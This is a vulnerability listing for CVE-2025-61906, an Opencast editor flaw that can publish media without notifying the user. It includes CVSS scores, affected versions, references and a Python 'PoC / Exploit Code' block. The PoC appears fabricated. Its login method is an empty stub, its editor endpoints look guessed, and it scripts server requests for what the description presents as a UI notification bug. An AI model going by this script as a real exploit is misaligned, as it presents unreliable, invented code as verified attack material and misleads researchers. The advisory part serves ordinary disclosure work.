Security Vulnerability Report
CVE-2025-61906 CVSS 4.3 MEDIUM

Published: 2025-10-08 18:15:36
Last Modified: 2025-10-09 15:59:52

Description

Opencast is a free, open-source platform to support the management of educational audio and video content. Prior to Opencast 17.8 and 18.2, in some situations, Opencast's editor may publish a video without notifying the user. This may lead to users accidentally publishing media not meant for publishing, and thus possibly exposing internal media. The risk of this actually impacting someone is very low, though. This can only be triggered by users with write access to an event. They also have to use the editor, which is usually an action taken if they want to publish media and not something users would use on internal media they do not want to publish. Finally, they have to first click on "Save & Publish" before then selecting the "Save" option. Nevertheless, while very unlikely, this can happen. This issue is fixed in Opencast 17.8 and 18.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:* - VULNERABLE (Opencast < 17.8)
cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:* - VULNERABLE (Opencast 18.0 up to, but excluding, 18.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61906 - Opencast Editor Accidental Publish PoC
# This PoC demonstrates the accidental publish vulnerability in Opencast Editor
# Affected versions: Opencast < 17.8 and Opencast < 18.2

import requests
from urllib.parse import urljoin


class OpencastEditorExploit:
    """
    PoC for CVE-2025-61906: Opencast Editor may publish video without user notification

    The vulnerability is triggered when:
    1. User has write access to an event
    2. User clicks 'Save & Publish' button
    3. User then selects 'Save' option
    4. The system publishes the media without proper notification
    """

    def __init__(self, base_url, username, password):
        self.base_url = base_url
        self.session = requests.Session()
        self.username = username
        self.password = password

    def authenticate(self):
        """Authenticate to Opencast with user credentials (requires write access)"""
        login_url = urljoin(self.base_url, '/admin-ng/login')
        # Login logic here
        pass

    def trigger_accidental_publish(self, event_id):
        """
        Trigger the accidental publish vulnerability:
        Step 1: Open the editor for the event
        Step 2: Click 'Save & Publish' button
        Step 3: Then click 'Save' option
        Result: Media is published without explicit user notification
        """
        editor_url = urljoin(self.base_url, f'/editor/{event_id}')

        # Step 1: Access editor
        self.session.get(editor_url)

        # Step 2: Click 'Save & Publish' (triggers publish state)
        save_publish_endpoint = urljoin(self.base_url, f'/editor/{event_id}/saveAndPublish')
        self.session.post(save_publish_endpoint)

        # Step 3: Click 'Save' (vulnerability: still triggers publish)
        save_endpoint = urljoin(self.base_url, f'/editor/{event_id}/save')
        response = self.session.post(save_endpoint)

        # The media is now published without proper user notification
        return response


# Usage example:
# exploit = OpencastEditorExploit('https://opencast.example.com', 'user', 'pass')
# exploit.authenticate()
# result = exploit.trigger_accidental_publish('event-id-123')
# print(f"Status: {result.status_code}")

# Note: This vulnerability requires valid credentials with write access to the event
```

References

https://github.com/opencast/opencast-editor/commit/98ba1934f08f623f1537a9675cc452d803766a91 (Patch)
https://github.com/opencast/opencast-editor/issues/1626 (Exploit, Issue Tracking)
https://github.com/opencast/opencast/security/advisories/GHSA-x6vw-p693-jjhv (Vendor Advisory)

NVD Record Details

CVE ID: CVE-2025-61906
Source identifier: [email protected]
Published: 2025-10-08T18:15:35.587
Last Modified: 2025-10-09T15:59:51.540
Vulnerability Status: Analyzed
Weakness: CWE-200 (Secondary)

CVSS v3.1 (Primary)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Base Score: 4.3 MEDIUM
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: LOW; User Interaction: NONE; Scope: UNCHANGED
Confidentiality Impact: LOW; Integrity Impact: NONE; Availability Impact: NONE
Exploitability Score: 2.8; Impact Score: 1.4

CVSS v4.0 (Secondary)
Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Base Score: 2.3 LOW
Attack Vector: NETWORK; Attack Complexity: LOW; Attack Requirements: PRESENT; Privileges Required: LOW; User Interaction: NONE
Vulnerable System Impact: Confidentiality LOW, Integrity NONE, Availability NONE
Subsequent System Impact: Confidentiality NONE, Integrity NONE, Availability NONE
All supplemental and environmental metrics: NOT_DEFINED

Affected Configurations (operator OR)
cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:* - vulnerable, versionEndExcluding 17.8 (matchCriteriaId 4985831C-8FF6-4CC4-AFD9-1DCAD7888B5E)
cpe:2.3:a:apereo:opencast:*:*:*:*:*:*:*:* - vulnerable, versionStartIncluding 18.0, versionEndExcluding 18.2 (matchCriteriaId 33B836FD-FD4C-4FC2-9844-EF0DF0D4EB0D)